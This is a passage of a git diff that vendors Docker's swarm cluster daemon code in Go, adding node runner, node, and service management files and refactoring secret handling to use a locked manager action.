+				if err != nil {
+					return errors.Wrap(errdefs.NotFound(err), "could not find the corresponding predefined swarm network")
+				}
+				goto setid
+			}
+			if ln != nil && !ln.Info().Dynamic() {
+				errMsg := fmt.Sprintf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name())
+				return errors.WithStack(notAllowedError(errMsg))
+			}
+			return err
+		}
+	setid:
+		networks[i].Target = apiNetwork.ID
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/noderunner.go b/vendor/github.com/docker/docker/daemon/cluster/noderunner.go
new file mode 100644
index 0000000000..87e65aaead
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/noderunner.go
@@ -0,0 +1,388 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"sync"
+	"time"
+
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/executor/container"
+	lncluster "github.com/docker/libnetwork/cluster"
+	swarmapi "github.com/docker/swarmkit/api"
+	swarmnode "github.com/docker/swarmkit/node"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"google.golang.org/grpc"
+	"google.golang.org/grpc/codes"
+	"google.golang.org/grpc/status"
+)
+
+// nodeRunner implements a manager for continuously running swarmkit node, restarting them with backoff delays if needed.
+type nodeRunner struct {
+	nodeState
+	mu             sync.RWMutex
+	done           chan struct{} // closed when swarmNode exits
+	ready          chan struct{} // closed when swarmNode becomes active
+	reconnectDelay time.Duration
+	config         nodeStartConfig
+
+	repeatedRun     bool
+	cancelReconnect func()
+	stopping        bool
+	cluster         *Cluster // only for accessing config helpers, never call any methods. TODO: change to config struct
+}
+
+// nodeStartConfig holds configuration needed to start a new node. Exported
+// fields of this structure are saved to disk in json. Unexported fields
+// contain data that shouldn't be persisted between daemon reloads.
+type nodeStartConfig struct {
+	// LocalAddr is this machine's local IP or hostname, if specified.
+	LocalAddr string
+	// RemoteAddr is the address that was given to "swarm join". It is used
+	// to find LocalAddr if necessary.
+	RemoteAddr string
+	// ListenAddr is the address we bind to, including a port.
+	ListenAddr string
+	// AdvertiseAddr is the address other nodes should connect to,
+	// including a port.
+	AdvertiseAddr string
+	// DataPathAddr is the address that has to be used for the data path
+	DataPathAddr string
+	// JoinInProgress is set to true if a join operation has started, but
+	// not completed yet.
+	JoinInProgress bool
+
+	joinAddr        string
+	forceNewCluster bool
+	joinToken       string
+	lockKey         []byte
+	autolock        bool
+	availability    types.NodeAvailability
+}
+
+func (n *nodeRunner) Ready() chan error {
+	c := make(chan error, 1)
+	n.mu.RLock()
+	ready, done := n.ready, n.done
+	n.mu.RUnlock()
+	go func() {
+		select {
+		case <-ready:
+		case <-done:
+		}
+		select {
+		case <-ready:
+		default:
+			n.mu.RLock()
+			c <- n.err
+			n.mu.RUnlock()
+		}
+		close(c)
+	}()
+	return c
+}
+
+func (n *nodeRunner) Start(conf nodeStartConfig) error {
+	n.mu.Lock()
+	defer n.mu.Unlock()
+
+	n.reconnectDelay = initialReconnectDelay
+
+	return n.start(conf)
+}
+
+func (n *nodeRunner) start(conf nodeStartConfig) error {
+	var control string
+	if runtime.GOOS == "windows" {
+		control = `\\.\pipe\` + controlSocket
+	} else {
+		control = filepath.Join(n.cluster.runtimeRoot, controlSocket)
+	}
+
+	joinAddr := conf.joinAddr
+	if joinAddr == "" && conf.JoinInProgress {
+		// We must have been restarted while trying to join a cluster.
+		// Continue trying to join instead of forming our own cluster.
+		joinAddr = conf.RemoteAddr
+	}
+
+	// Hostname is not set here. Instead, it is obtained from
+	// the node description that is reported periodically
+	swarmnodeConfig := swarmnode.Config{
+		ForceNewCluster:    conf.forceNewCluster,
+		ListenControlAPI:   control,
+		ListenRemoteAPI:    conf.ListenAddr,
+		AdvertiseRemoteAPI: conf.AdvertiseAddr,
+		JoinAddr:           joinAddr,
+		StateDir:           n.cluster.root,
+		JoinToken:          conf.joinToken,
+		Executor: container.NewExecutor(
+			n.cluster.config.Backend,
+			n.cluster.config.PluginBackend,
+			n.cluster.config.ImageBackend,
+			n.cluster.config.VolumeBackend,
+		),
+		HeartbeatTick: n.cluster.config.RaftHeartbeatTick,
+		// Recommended value in etcd/raft is 10 x (HeartbeatTick).
+		// Lower values were seen to have caused instability because of
+		// frequent leader elections when running on flakey networks.
+		ElectionTick:     n.cluster.config.RaftElectionTick,
+		UnlockKey:        conf.lockKey,
+		AutoLockManagers: conf.autolock,
+		PluginGetter:     n.cluster.config.Backend.PluginGetter(),
+	}
+	if conf.availability != "" {
+		avail, ok := swarmapi.NodeSpec_Availability_value[strings.ToUpper(string(conf.availability))]
+		if !ok {
+			return fmt.Errorf("invalid Availability: %q", conf.availability)
+		}
+		swarmnodeConfig.Availability = swarmapi.NodeSpec_Availability(avail)
+	}
+	node, err := swarmnode.New(&swarmnodeConfig)
+	if err != nil {
+		return err
+	}
+	if err := node.Start(context.Background()); err != nil {
+		return err
+	}
+
+	n.done = make(chan struct{})
+	n.ready = make(chan struct{})
+	n.swarmNode = node
+	if conf.joinAddr != "" {
+		conf.JoinInProgress = true
+	}
+	n.config = conf
+	savePersistentState(n.cluster.root, conf)
+
+	ctx, cancel := context.WithCancel(context.Background())
+
+	go func() {
+		n.handleNodeExit(node)
+		cancel()
+	}()
+
+	go n.handleReadyEvent(ctx, node, n.ready)
+	go n.handleControlSocketChange(ctx, node)
+
+	return nil
+}
+
+func (n *nodeRunner) handleControlSocketChange(ctx context.Context, node *swarmnode.Node) {
+	for conn := range node.ListenControlSocket(ctx) {
+		n.mu.Lock()
+		if n.grpcConn != conn {
+			if conn == nil {
+				n.controlClient = nil
+				n.logsClient = nil
+			} else {
+				n.controlClient = swarmapi.NewControlClient(conn)
+				n.logsClient = swarmapi.NewLogsClient(conn)
+				// push store changes to daemon
+				go n.watchClusterEvents(ctx, conn)
+			}
+		}
+		n.grpcConn = conn
+		n.mu.Unlock()
+		n.cluster.SendClusterEvent(lncluster.EventSocketChange)
+	}
+}
+
+func (n *nodeRunner) watchClusterEvents(ctx context.Context, conn *grpc.ClientConn) {
+	client := swarmapi.NewWatchClient(conn)
+	watch, err := client.Watch(ctx, &swarmapi.WatchRequest{
+		Entries: []*swarmapi.WatchRequest_WatchEntry{
+			{
+				Kind:   "node",
+				Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove,
+			},
+			{
+				Kind:   "service",
+				Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove,
+			},
+			{
+				Kind:   "network",
+				Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove,
+			},
+			{
+				Kind:   "secret",
+				Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove,
+			},
+			{
+				Kind:   "config",
+				Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove,
+			},
+		},
+		IncludeOldObject: true,
+	})
+	if err != nil {
+		logrus.WithError(err).Error("failed to watch cluster store")
+		return
+	}
+	for {
+		msg, err := watch.Recv()
+		if err != nil {
+			// store watch is broken
+			errStatus, ok := status.FromError(err)
+			if !ok || errStatus.Code() != codes.Canceled {
+				logrus.WithError(err).Error("failed to receive changes from store watch API")
+			}
+			return
+		}
+		select {
+		case <-ctx.Done():
+			return
+		case n.cluster.watchStream <- msg:
+		}
+	}
+}
+
+func (n *nodeRunner) handleReadyEvent(ctx context.Context, node *swarmnode.Node, ready chan struct{}) {
+	select {
+	case <-node.Ready():
+		n.mu.Lock()
+		n.err = nil
+		if n.config.JoinInProgress {
+			n.config.JoinInProgress = false
+			savePersistentState(n.cluster.root, n.config)
+		}
+		n.mu.Unlock()
+		close(ready)
+	case <-ctx.Done():
+	}
+	n.cluster.SendClusterEvent(lncluster.EventNodeReady)
+}
+
+func (n *nodeRunner) handleNodeExit(node *swarmnode.Node) {
+	err := detectLockedError(node.Err(context.Background()))
+	if err != nil {
+		logrus.Errorf("cluster exited with error: %v", err)
+	}
+	n.mu.Lock()
+	n.swarmNode = nil
+	n.err = err
+	close(n.done)
+	select {
+	case <-n.ready:
+		n.enableReconnectWatcher()
+	default:
+		if n.repeatedRun {
+			n.enableReconnectWatcher()
+		}
+	}
+	n.repeatedRun = true
+	n.mu.Unlock()
+}
+
+// Stop stops the current swarm node if it is running.
+func (n *nodeRunner) Stop() error {
+	n.mu.Lock()
+	if n.cancelReconnect != nil { // between restarts
+		n.cancelReconnect()
+		n.cancelReconnect = nil
+	}
+	if n.swarmNode == nil {
+		n.mu.Unlock()
+		return nil
+	}
+	n.stopping = true
+	ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
+	defer cancel()
+	n.mu.Unlock()
+	if err := n.swarmNode.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") {
+		return err
+	}
+	n.cluster.SendClusterEvent(lncluster.EventNodeLeave)
+	<-n.done
+	return nil
+}
+
+func (n *nodeRunner) State() nodeState {
+	if n == nil {
+		return nodeState{status: types.LocalNodeStateInactive}
+	}
+	n.mu.RLock()
+	defer n.mu.RUnlock()
+
+	ns := n.nodeState
+
+	if ns.err != nil || n.cancelReconnect != nil {
+		if errors.Cause(ns.err) == errSwarmLocked {
+			ns.status = types.LocalNodeStateLocked
+		} else {
+			ns.status = types.LocalNodeStateError
+		}
+	} else {
+		select {
+		case <-n.ready:
+			ns.status = types.LocalNodeStateActive
+		default:
+			ns.status = types.LocalNodeStatePending
+		}
+	}
+
+	return ns
+}
+
+func (n *nodeRunner) enableReconnectWatcher() {
+	if n.stopping {
+		return
+	}
+	n.reconnectDelay *= 2
+	if n.reconnectDelay > maxReconnectDelay {
+		n.reconnectDelay = maxReconnectDelay
+	}
+	logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds())
+	delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay)
+	n.cancelReconnect = cancel
+
+	go func() {
+		<-delayCtx.Done()
+		if delayCtx.Err() != context.DeadlineExceeded {
+			return
+		}
+		n.mu.Lock()
+		defer n.mu.Unlock()
+		if n.stopping {
+			return
+		}
+
+		if err := n.start(n.config); err != nil {
+			n.err = err
+		}
+	}()
+}
+
+// nodeState represents information about the current state of the cluster and
+// provides access to the grpc clients.
+type nodeState struct {
+	swarmNode       *swarmnode.Node
+	grpcConn        *grpc.ClientConn
+	controlClient   swarmapi.ControlClient
+	logsClient      swarmapi.LogsClient
+	status          types.LocalNodeState
+	actualLocalAddr string
+	err             error
+}
+
+// IsActiveManager returns true if node is a manager ready to accept control requests. It is safe to access the client properties if this returns true.
+func (ns nodeState) IsActiveManager() bool {
+	return ns.controlClient != nil
+}
+
+// IsManager returns true if node is a manager.
+func (ns nodeState) IsManager() bool {
+	return ns.swarmNode != nil && ns.swarmNode.Manager() != nil
+}
+
+// NodeID returns node's ID or empty string if node is inactive.
+func (ns nodeState) NodeID() string {
+	if ns.swarmNode != nil {
+		return ns.swarmNode.NodeID()
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/nodes.go b/vendor/github.com/docker/docker/daemon/cluster/nodes.go
new file mode 100644
index 0000000000..3c073b0bac
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/nodes.go
@@ -0,0 +1,105 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+
+	apitypes "github.com/docker/docker/api/types"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	"github.com/docker/docker/errdefs"
+	swarmapi "github.com/docker/swarmkit/api"
+)
+
+// GetNodes returns a list of all nodes known to a cluster.
+func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return nil, c.errNoManager(state)
+	}
+
+	filters, err := newListNodesFilters(options.Filters)
+	if err != nil {
+		return nil, err
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := state.controlClient.ListNodes(
+		ctx,
+		&swarmapi.ListNodesRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	nodes := make([]types.Node, 0, len(r.Nodes))
+
+	for _, node := range r.Nodes {
+		nodes = append(nodes, convert.NodeFromGRPC(*node))
+	}
+	return nodes, nil
+}
+
+// GetNode returns a node based on an ID.
+func (c *Cluster) GetNode(input string) (types.Node, error) {
+	var node *swarmapi.Node
+
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		n, err := getNode(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+		node = n
+		return nil
+	}); err != nil {
+		return types.Node{}, err
+	}
+
+	return convert.NodeFromGRPC(*node), nil
+}
+
+// UpdateNode updates existing nodes properties.
+func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		nodeSpec, err := convert.NodeSpecToGRPC(spec)
+		if err != nil {
+			return errdefs.InvalidParameter(err)
+		}
+
+		ctx, cancel := c.getRequestContext()
+		defer cancel()
+
+		currentNode, err := getNode(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		_, err = state.controlClient.UpdateNode(
+			ctx,
+			&swarmapi.UpdateNodeRequest{
+				NodeID: currentNode.ID,
+				Spec:   &nodeSpec,
+				NodeVersion: &swarmapi.Version{
+					Index: version,
+				},
+			},
+		)
+		return err
+	})
+}
+
+// RemoveNode removes a node from a cluster
+func (c *Cluster) RemoveNode(input string, force bool) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		node, err := getNode(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		_, err = state.controlClient.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force})
+		return err
+	})
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go
index f4c72ae13b..533baa0e17 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go
@@ -1,4 +1,4 @@
-package provider
+package provider // import "github.com/docker/docker/daemon/cluster/provider"
 
 import "github.com/docker/docker/api/types"
 
diff --git a/vendor/github.com/docker/docker/daemon/cluster/secrets.go b/vendor/github.com/docker/docker/daemon/cluster/secrets.go
index 2b9eb5da1d..c6fd842081 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/secrets.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/secrets.go
@@ -1,6 +1,8 @@
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
 
 import (
+	"context"
+
 	apitypes "github.com/docker/docker/api/types"
 	types "github.com/docker/docker/api/types/swarm"
 	"github.com/docker/docker/daemon/cluster/convert"
@@ -8,32 +10,30 @@ import (
 )
 
 // GetSecret returns a secret from a managed swarm cluster
-func (c *Cluster) GetSecret(id string) (types.Secret, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return types.Secret{}, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	r, err := c.node.client.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: id})
-	if err != nil {
+func (c *Cluster) GetSecret(input string) (types.Secret, error) {
+	var secret *swarmapi.Secret
+
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		s, err := getSecret(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+		secret = s
+		return nil
+	}); err != nil {
 		return types.Secret{}, err
 	}
-
-	return convert.SecretFromGRPC(r.Secret), nil
+	return convert.SecretFromGRPC(secret), nil
 }
 
 // GetSecrets returns all secrets of a managed swarm cluster.
 func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret, error) {
-	c.RLock()
-	defer c.RUnlock()
+	c.mu.RLock()
+	defer c.mu.RUnlock()
 
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return nil, c.errNoManager(state)
 	}
 
 	filters, err := newListSecretsFilters(options.Filters)
@@ -43,13 +43,13 @@ func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret
 	ctx, cancel := c.getRequestContext()
 	defer cancel()
 
-	r, err := c.node.client.ListSecrets(ctx,
+	r, err := state.controlClient.ListSecrets(ctx,
 		&swarmapi.ListSecretsRequest{Filters: filters})
 	if err != nil {
 		return nil, err
 	}
 
-	secrets := []types.Secret{}
+	secrets := make([]types.Secret, 0, len(r.Secrets))
 
 	for _, secret := range r.Secrets {
 		secrets = append(secrets, convert.SecretFromGRPC(secret))
@@ -60,74 +60,59 @@ func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret
 
 // CreateSecret creates a new secret in a managed swarm cluster.
 func (c *Cluster) CreateSecret(s types.SecretSpec) (string, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return "", c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	secretSpec := convert.SecretSpecToGRPC(s)
-
-	r, err := c.node.client.CreateSecret(ctx,
-		&swarmapi.CreateSecretRequest{Spec: &secretSpec})
-	if err != nil {
+	var resp *swarmapi.CreateSecretResponse
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		secretSpec := convert.SecretSpecToGRPC(s)
+
+		r, err := state.controlClient.CreateSecret(ctx,
+			&swarmapi.CreateSecretRequest{Spec: &secretSpec})
+		if err != nil {
+			return err
+		}
+		resp = r
+		return nil
+	}); err != nil {
 		return "", err
 	}
-
-	return r.Secret.ID, nil
+	return resp.Secret.ID, nil
 }
 
 // RemoveSecret removes a secret from a managed swarm cluster.
-func (c *Cluster) RemoveSecret(id string) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	req := &swarmapi.RemoveSecretRequest{
-		SecretID: id,
-	}
-
-	if _, err := c.node.client.RemoveSecret(ctx, req); err != nil {
+func (c *Cluster) RemoveSecret(input string) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		secret, err := getSecret(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		req := &swarmapi.RemoveSecretRequest{
+			SecretID: secret.ID,
+		}
+
+		_, err = state.controlClient.RemoveSecret(ctx, req)
 		return err
-	}
-	return nil
+	})
 }
 
 // UpdateSecret updates a secret in a managed swarm cluster.
 // Note: this is not exposed to the CLI but is available from the API only
-func (c *Cluster) UpdateSecret(id string, version uint64, spec types.SecretSpec) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	secretSpec := convert.SecretSpecToGRPC(spec)
-
-	if _, err := c.client.UpdateSecret(ctx,
-		&swarmapi.UpdateSecretRequest{
-			SecretID: id,
-			SecretVersion: &swarmapi.Version{
-				Index: version,
-			},
-			Spec: &secretSpec,
-		}); err != nil {
+func (c *Cluster) UpdateSecret(input string, version uint64, spec types.SecretSpec) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		secret, err := getSecret(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		secretSpec := convert.SecretSpecToGRPC(spec)
+
+		_, err = state.controlClient.UpdateSecret(ctx,
+			&swarmapi.UpdateSecretRequest{
+				SecretID: secret.ID,
+				SecretVersion: &swarmapi.Version{
+					Index: version,
+				},
+				Spec: &secretSpec,
+			})
 		return err
-	}
-
-	return nil
+	})
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/services.go b/vendor/github.com/docker/docker/daemon/cluster/services.go
new file mode 100644
index 0000000000..c14037645c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/services.go
@@ -0,0 +1,602 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/distribution/reference"
+	apitypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	types "github.com/docker/docker/api/types/swarm"
+	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/docker/docker/daemon/cluster/convert"
+	"github.com/docker/docker/errdefs"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	swarmapi "github.com/docker/swarmkit/api"
+	gogotypes "github.com/gogo/protobuf/types"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// GetServices returns all services of a managed swarm cluster.
+func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return nil, c.errNoManager(state)
+	}
+
+	// We move the accepted filter check here as "mode" filter
+	// is processed in the daemon, not in SwarmKit. So it might
+	// be good to have accepted file check in the same file as
+	// the filter processing (in the for loop below).
+	accepted := map[string]bool{
+		"name":    true,
+		"id":      true,
+		"label":   true,
+		"mode":    true,
+		"runtime": true,
+	}
+	if err := options.Filters.Validate(accepted); err != nil {
+		return nil, err
+	}
+
+	if len(options.Filters.Get("runtime")) == 0 {
+		// Default to using the container runtime filter
+		options.Filters.Add("runtime", string(types.RuntimeContainer))
+	}
+
+	filters := &swarmapi.ListServicesRequest_Filters{
+		NamePrefixes: options.Filters.Get("name"),
+		IDPrefixes:   options.Filters.Get("id"),
+		Labels:       runconfigopts.ConvertKVStringsToMap(options.Filters.Get("label")),
+		Runtimes:     options.Filters.Get("runtime"),
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := state.controlClient.ListServices(
+		ctx,
+		&swarmapi.ListServicesRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	services := make([]types.Service, 0, len(r.Services))
+
+	for _, service := range r.Services {
+		if options.Filters.Contains("mode") {
+			var mode string
+			switch service.Spec.GetMode().(type) {
+			case *swarmapi.ServiceSpec_Global:
+				mode = "global"
+			case *swarmapi.ServiceSpec_Replicated:
+				mode = "replicated"
+			}
+
+			if !options.Filters.ExactMatch("mode", mode) {
+				continue
+			}
+		}
+		svcs, err := convert.ServiceFromGRPC(*service)
+		if err != nil {
+			return nil, err
+		}
+		services = append(services, svcs)
+	}
+
+	return services, nil
+}
+
+// GetService returns a service based on an ID or name.
+func (c *Cluster) GetService(input string, insertDefaults bool) (types.Service, error) {
+	var service *swarmapi.Service
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		s, err := getService(ctx, state.controlClient, input, insertDefaults)
+		if err != nil {
+			return err
+		}
+		service = s
+		return nil
+	}); err != nil {
+		return types.Service{}, err
+	}
+	svc, err := convert.ServiceFromGRPC(*service)
+	if err != nil {
+		return types.Service{}, err
+	}
+	return svc, nil
+}
+
+// CreateService creates a new service in a managed swarm cluster.
+func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string, queryRegistry bool) (*apitypes.ServiceCreateResponse, error) {
+	var resp *apitypes.ServiceCreateResponse
+	err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		err := c.populateNetworkID(ctx, state.controlClient, &s)
+		if err != nil {
+			return err
+		}
+
+		serviceSpec, err := convert.ServiceSpecToGRPC(s)
+		if err != nil {
+			return errdefs.InvalidParameter(err)
+		}
+
+		resp = &apitypes.ServiceCreateResponse{}
+
+		switch serviceSpec.Task.Runtime.(type) {
+		case *swarmapi.TaskSpec_Attachment:
+			return fmt.Errorf("invalid task spec: spec type %q not supported", types.RuntimeNetworkAttachment)
+		// handle other runtimes here
+		case *swarmapi.TaskSpec_Generic:
+			switch serviceSpec.Task.GetGeneric().Kind {
+			case string(types.RuntimePlugin):
+				info, _ := c.config.Backend.SystemInfo()
+				if !info.ExperimentalBuild {
+					return fmt.Errorf("runtime type %q only supported in experimental", types.RuntimePlugin)
+				}
+				if s.TaskTemplate.PluginSpec == nil {
+					return errors.New("plugin spec must be set")
+				}
+
+			default:
+				return fmt.Errorf("unsupported runtime type: %q", serviceSpec.Task.GetGeneric().Kind)
+			}
+
+			r, err := state.controlClient.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec})
+			if err != nil {
+				return err
+			}
+
+			resp.ID = r.Service.ID
+		case *swarmapi.TaskSpec_Container:
+			ctnr := serviceSpec.Task.GetContainer()
+			if ctnr == nil {
+				return errors.New("service does not use container tasks")
+			}
+			if encodedAuth != "" {
+				ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth}
+			}
+
+			// retrieve auth config from encoded auth
+			authConfig := &apitypes.AuthConfig{}
+			if encodedAuth != "" {
+				authReader := strings.NewReader(encodedAuth)
+				dec := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, authReader))
+				if err := dec.Decode(authConfig); err != nil {
+					logrus.Warnf("invalid authconfig: %v", err)
+				}
+			}
+
+			// pin image by digest for API versions < 1.30
+			// TODO(nishanttotla): The check on "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE"
+			// should be removed in the future. Since integration tests only use the
+			// latest API version, so this is no longer required.
+			if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" && queryRegistry {
+				digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig)
+				if err != nil {
+					logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())
+					// warning in the client response should be concise
+					resp.Warnings = append(resp.Warnings, digestWarning(ctnr.Image))
+
+				} else if ctnr.Image != digestImage {
+					logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage)
+					ctnr.Image = digestImage
+
+				} else {
+					logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image)
+
+				}
+
+				// Replace the context with a fresh one.
+				// If we timed out while communicating with the
+				// registry, then "ctx" will already be expired, which
+				// would cause UpdateService below to fail. Reusing
+				// "ctx" could make it impossible to create a service
+				// if the registry is slow or unresponsive.
+				var cancel func()
+				ctx, cancel = c.getRequestContext()
+				defer cancel()
+			}
+
+			r, err := state.controlClient.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec})
+			if err != nil {
+				return err
+			}
+
+			resp.ID = r.Service.ID
+		}
+		return nil
+	})
+
+	return resp, err
+}
+
+// UpdateService updates existing service to match new properties.
+func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, flags apitypes.ServiceUpdateOptions, queryRegistry bool) (*apitypes.ServiceUpdateResponse, error) {
+	var resp *apitypes.ServiceUpdateResponse
+
+	err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+
+		err := c.populateNetworkID(ctx, state.controlClient, &spec)
+		if err != nil {
+			return err
+		}
+
+		serviceSpec, err := convert.ServiceSpecToGRPC(spec)
+		if err != nil {
+			return errdefs.InvalidParameter(err)
+		}
+
+		currentService, err := getService(ctx, state.controlClient, serviceIDOrName, false)
+		if err != nil {
+			return err
+		}
+
+		resp = &apitypes.ServiceUpdateResponse{}
+
+		switch serviceSpec.Task.Runtime.(type) {
+		case *swarmapi.TaskSpec_Attachment:
+			return fmt.Errorf("invalid task spec: spec type %q not supported", types.RuntimeNetworkAttachment)
+		case *swarmapi.TaskSpec_Generic:
+			switch serviceSpec.Task.GetGeneric().Kind {
+			case string(types.RuntimePlugin):
+				if spec.TaskTemplate.PluginSpec == nil {
+					return errors.New("plugin spec must be set")
+				}
+			}
+		case *swarmapi.TaskSpec_Container:
+			newCtnr := serviceSpec.Task.GetContainer()
+			if newCtnr == nil {
+				return errors.New("service does not use container tasks")
+			}
+
+			encodedAuth := flags.EncodedRegistryAuth
+			if encodedAuth != "" {
+				newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth}
+			} else {
+				// this is needed because if the encodedAuth isn't being updated then we
+				// shouldn't lose it, and continue to use the one that was already present
+				var ctnr *swarmapi.ContainerSpec
+				switch flags.RegistryAuthFrom {
+				case apitypes.RegistryAuthFromSpec, "":
+					ctnr = currentService.Spec.Task.GetContainer()
+				case apitypes.RegistryAuthFromPreviousSpec:
+					if currentService.PreviousSpec == nil {
+						return errors.New("service does not have a previous spec")
+					}
+					ctnr = currentService.PreviousSpec.Task.GetContainer()
+				default:
+					return errors.New("unsupported registryAuthFrom value")
+				}
+				if ctnr == nil {
+					return errors.New("service does not use container tasks")
+				}
+				newCtnr.PullOptions = ctnr.PullOptions
+				// update encodedAuth so it can be used to pin image by digest
+				if ctnr.PullOptions != nil {
+					encodedAuth = ctnr.PullOptions.RegistryAuth
+				}
+			}
+
+			// retrieve auth config from encoded auth
+			authConfig := &apitypes.AuthConfig{}
+			if encodedAuth != "" {
+				if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil {
+					logrus.Warnf("invalid authconfig: %v", err)
+				}
+			}
+
+			// pin image by digest for API versions < 1.30
+			// TODO(nishanttotla): The check on "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE"
+			// should be removed in the future. Since integration tests only use the
+			// latest API version, so this is no longer required.
